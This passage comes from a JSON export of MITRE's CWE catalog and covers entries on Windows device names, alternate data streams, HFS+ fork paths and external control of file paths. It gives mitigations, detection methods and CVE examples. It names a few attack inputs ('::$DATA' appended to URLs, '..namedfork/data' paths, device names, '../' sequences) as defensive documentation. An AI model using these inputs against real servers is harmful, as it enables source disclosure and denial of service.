entities. They are not necessarily listed in directories.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Virtual Files"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Virtual Files","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle File Names that Identify Virtual Resources","attr":{"@_Date":"2009-03-10"}}]}},"67":{"attr":{"@_ID":"67","@_Name":"Improper Handling of Windows Device Names","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software constructs pathnames from user input, but it does not handle or incorrectly handles a pathname containing a Windows device name such as AUX or CON. This typically leads to denial of service or an information exposure when the application attempts to process the pathname as a regular file.","Extended_Description":"Not properly handling virtual filenames (e.g. AUX, CON, PRN, COM1, LPT1) can result in different types of vulnerabilities. In some cases an attacker can request a device via injection of a virtual filename in a URL, which may cause an error that leads to a denial of service or an error page that reveals sensitive information. A software system that allows device names to bypass filtering runs the risk of an attacker injecting malicious code in a file with the name of a device.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"66","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Historically, there was a bug in the Windows operating system that caused a blue screen of death. Even after that issue was fixed DOS device names continue to be a factor."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Availability","Confidentiality","Other"],"Impact":["DoS: Crash, Exit, or Restart","Read Application Data","Other"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Be familiar with the device names in the operating system where your system is deployed. Check input for these device names."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0106","Description":"Server allows remote attackers to cause a denial of service via a series of requests to .JSP files that contain an MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0106"},{"Reference":"CVE-2002-0200","Description":"Server allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0200"},{"Reference":"CVE-2002-1052","Description":"Product allows remote attackers to use MS-DOS device names in HTTP requests to cause a denial of service or obtain the physical path of the server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1052"},{"Reference":"CVE-2001-0493","Description":"Server allows remote attackers to cause a denial of service via a URL that contains an MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0493"},{"Reference":"CVE-2001-0558","Description":"Server allows a remote attacker to create a denial of service via a URL request which includes a MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0558"},{"Reference":"CVE-2000-0168","Description":"Microsoft Windows 9x operating systems allow an attacker to cause a denial of service via a pathname that includes file device names, aka the \\"DOS Device in Path Name\\" vulnerability.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0168"},{"Reference":"CVE-2001-0492","Description":"Server allows remote attackers to determine the physical path of the server via a URL containing MS-DOS device names.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0492"},{"Reference":"CVE-2004-0552","Description":"Product does not properly handle files whose names contain reserved MS-DOS device names, which can allow malicious code to bypass detection when it is installed, copied, or executed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0552"},{"Reference":"CVE-2005-2195","Description":"Server allows remote attackers to cause a denial of service (application crash) via a URL with a filename containing a .cgi extension and an MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2195"}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows MS-DOS device names"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO32-C","Entry_Name":"Do not perform operations on devices that are only appropriate for files","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO00-J","Entry_Name":"Do not operate on files in shared directories"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, &#34;Device Files&#34;, Page 666"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Background_Details, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Windows MS-DOS Device Names","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Windows Device Names","attr":{"@_Date":"2009-03-10"}}]}},"69":{"attr":{"@_ID":"69","@_Name":"Improper Handling of Windows ::DATA Alternate Data Stream","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly prevent access to, or detect usage of, alternate data streams (ADS).","Extended_Description":"An attacker can use an ADS to hide information about a file (e.g. size, the name of the process) from a system or file browser tools such as Windows Explorer and \'dir\' at the command line utility. Alternately, the attacker might be able to bypass intended access restrictions for the associated data fork.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"66","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Alternate data streams (ADS) were first implemented in the Windows NT operating system to provide compatibility between NTFS and the Macintosh Hierarchical File System (HFS). In HFS, data and resource forks are used to store information about a file. The data fork provides information about the contents of the file while the resource fork stores metadata such as file type."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Non-Repudiation","Other"],"Impact":["Bypass Protection Mechanism","Hide Activities","Other"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":"Software tools are capable of finding ADSs on your system."},{"Phase":"Implementation","Description":"Ensure that the source code correctly parses the filename to read or write to the correct stream."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0278","Description":"In IIS, remote attackers can obtain source code for ASP files by appending \\"::$DATA\\" to the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0278"},{"Reference":"CVE-2000-0927","Description":"Product does not properly record file sizes if they are stored in alternative data streams, which allows users to bypass quota restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0927"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows ::DATA alternate data stream"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"168"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-562"}},{"attr":{"@_External_Reference_ID":"REF-7"}}]},"Notes":{"Note":{"#text":"This and similar problems exist because the same resource can have multiple identifiers that dictate which behavior can be performed on the resource.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Background_Details, Description, Relationships, Other_Notes, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Windows ::DATA Alternate Data Stream","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Windows ::DATA Alternate Data Stream","attr":{"@_Date":"2010-12-13"}}]}},"71":{"attr":{"@_ID":"71","@_Name":"DEPRECATED: Apple \'.DS_Store\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated as it represents a specific observed example of a UNIX Hard Link weakness type rather than its own individual weakness type. Please refer to CWE-62.","Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Name, Observed_Examples, Relationships, Research_Gaps, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Taxonomy_Mappings"}],"Previous_Entry_Name":{"#text":"Apple \'.DS_Store\'","attr":{"@_Date":"2017-11-08"}}}},"72":{"attr":{"@_ID":"72","@_Name":"Improper Handling of Apple HFS+ Alternate Data Stream Path","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly handle special paths that may identify the data or resource fork of a file on the HFS+ file system.","Extended_Description":"If the software chooses actions to take based on the file name, then if an attacker provides the data or resource fork, the software may take unexpected actions. Further, if the software intends to restrict access to a file, then an attacker might still be able to bypass intended access restrictions by requesting the data or resource fork for that file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"66","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"macOS","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["The Apple HFS+ file system permits files to have multiple data input streams, accessible through special paths. The Mac OS X operating system provides a way to access the different data input streams through special paths and as an extended attribute:","Additionally, on filesystems that lack native support for multiple streams, the resource fork and file metadata may be stored in a file with \\"._\\" prepended to the name.","Forks can also be accessed through non-portable APIs.","Forks inherit the file system access controls of the file they belong to.","Programs need to control access to these paths, if the processing of a file system object is dependent on the structure of its path."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["- Resource fork: file/..namedfork/rsrc, file/rsrc (deprecated), xattr:com.apple.ResourceFork","- Data fork: file/..namedfork/data (only versions prior to Mac OS X v10.5)"]}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A web server that interprets FILE.cgi as processing instructions could disclose the source code for FILE.cgi by requesting FILE.cgi/..namedfork/data. This might occur because the web server invokes the default handler which may return the contents of the file."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-1084","Description":"Server allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1084"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-578"}}},"Notes":{"Note":[{"#text":"This and similar problems exist because the same resource can have multiple identifiers that dictate which behavior can be performed on the resource.","attr":{"@_Type":"Theoretical"}},{"#text":"Under-studied","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"David Remahl","Modification_Organization":"Apple","Modification_Date":"2008-11-05","Modification_Comment":"clarified description, provided background details, and added demonstrative example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Applicable_Platforms, Background_Details, Demonstrative_Examples, Description, Name, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Apple HFS+ Alternate Data Stream","attr":{"@_Date":"2008-11-24"}},{"#text":"Failure to Handle Apple HFS+ Alternate Data Stream Path","attr":{"@_Date":"2009-05-27"}}]}},"73":{"attr":{"@_ID":"73","@_Name":"External Control of File Name or Path","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software allows user input to control or influence paths or file names that are used in filesystem operations.","Extended_Description":{"xhtml:p":["This could allow an attacker to access or modify system files or other files that are critical to the application.","Path manipulation errors occur when the following two conditions are met:","For example, the program may give the attacker the ability to overwrite the specified file or run with a configuration controlled by the attacker."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["1. An attacker can specify a path used in an operation on the filesystem.","2. By specifying the resource, the attacker gains a capability that would not otherwise be permitted."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"22","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"41","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"434","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"59","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":[{"attr":{"@_Class":"Unix","@_Prevalence":"Often"}},{"attr":{"@_Class":"Windows","@_Prevalence":"Often"}},{"attr":{"@_Class":"macOS","@_Prevalence":"Often"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality"],"Impact":["Read Files or Directories","Modify Files or Directories"],"Note":"The application can operate on unexpected files. Confidentiality is violated when the targeted filename is not directly readable by the attacker."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Files or Directories","Execute Unauthorized Code or Commands"],"Note":"The application can operate on unexpected files. This may violate integrity if the filename is written to, or if the filename is for a program or other form of executable code."},{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (Other)"],"Note":"The application can operate on unexpected files. Availability can be violated if the attacker specifies an unexpected file that the application modifies. Availability can also be affected if the attacker specifies a filename for a large file, or points to a special device or a file that does not have the format that the application expects."}]},"Detection_Methods":{"Detection_Method":{"Method":"Automated Static Analysis","Description":{"xhtml:p":["The external control or influence of filenames can often be detected using automated static analysis that models data flow within the software.","Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes."]}}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When the set of filenames is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames, and reject all other inputs. For example, ID 1 could map to \\"inbox.txt\\" and ID 2 could map to \\"profile.txt\\". Features such as the ESAPI AccessReferenceMap provide this capability."},{"Phase":["Architecture and Design","Operation"],"Description":{"xhtml:p":["Run your code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict all access to files within a particular directory.","Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]}},{"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"Phase":"Implementation","Description":"Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes \\"..\\" sequences and symbolic links (CWE-23, CWE-59)."},{"Phase":["Installation","Operation"],"Description":"Use OS-level permissions and run as a low-privileged user to limit the scope of any successful attack."},{"Phase":["Operation","Implementation"],"Description":"If you are using PHP, configure your application so that it does not use register_globals. During implementation, develop your application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not 